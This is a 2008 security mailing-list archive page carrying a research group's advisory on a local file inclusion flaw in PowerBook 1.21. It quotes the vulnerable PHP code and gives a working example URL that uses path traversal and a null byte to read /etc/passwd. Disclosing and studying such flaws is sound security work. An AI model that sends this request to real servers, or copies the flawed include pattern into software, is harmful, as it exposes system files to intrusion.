Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[DSECRG-08-019] LFI in PowerBook 1.21

from [Digital Security Research Group] Network Security [Permanent Link]
Subject: [DSECRG-08-019] LFI in PowerBook 1.21
Date: Mon, 24 Mar 2008 19:42:20 +0300 
Hello, bugtraq.


[DSECRG-08-031] Digital Security Research Group [DSecRG] Advisory


Application:                    PowerBook
Versions Affected:              1.21
Vendor URL:                     http://www.powerscripts.org/
Bug:                            Local File Include
Exploits:                       YES
Reported:                       01.02.2008
Vendor Response:                none
Solution:                       none
Date of Public Advisory:        ..2008
Author:                         Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***********

Local File Include vulnerability found in script pb_inc/admincenter/index.php 

Non-authentication user can directly access to this script.

To exploit this vulnerability REGISTER_GLOBALS option must be ON in php config 
file.


Code
****
#################################################

  if (!$page) {
     $page = "home";
  }

  $page .= ".inc.php";

  if(file_exists($page) == false) {
     echo "
        <div align=\"center\">Sorry, the page <b>$page</b> does not exist!</div>
     ";
  } else {
     include("$page");
  }

#################################################


Example:

http://[server]/[installdir]/pb_inc/admincenter/index.php?page=../../../../../../../../../../../../../etc/passwd%00



About
*****

Digital Security is leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact:        research [at] dsec [dot] ru
                http://www.dsec.ru (in Russian)



-- 
Alexandr Polyakov
DIGITAL SECURITY RESEARCH GROUP

                       mailto:research@dsec.ru
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [DSECRG-08-019] LFI in PowerBook 1.21, Digital Security Research Group <=
Previous by Date:  [SECURITY] [DSA 1527-1] New debian-goodies packages fix privilege escalation, Thijs Kinkhorst
Next by Date:  [DSECRG-08-020] RFI-LFI in PowerClan 1.14a, Digital Security Research Group
Previous by Thread:  [SECURITY] [DSA 1527-1] New debian-goodies packages fix privilege escalation, Thijs Kinkhorst
Next by Thread:  [DSECRG-08-020] RFI-LFI in PowerClan 1.14a, Digital Security Research Group
Indexes:  [Date] [Thread] [Top] [All Lists]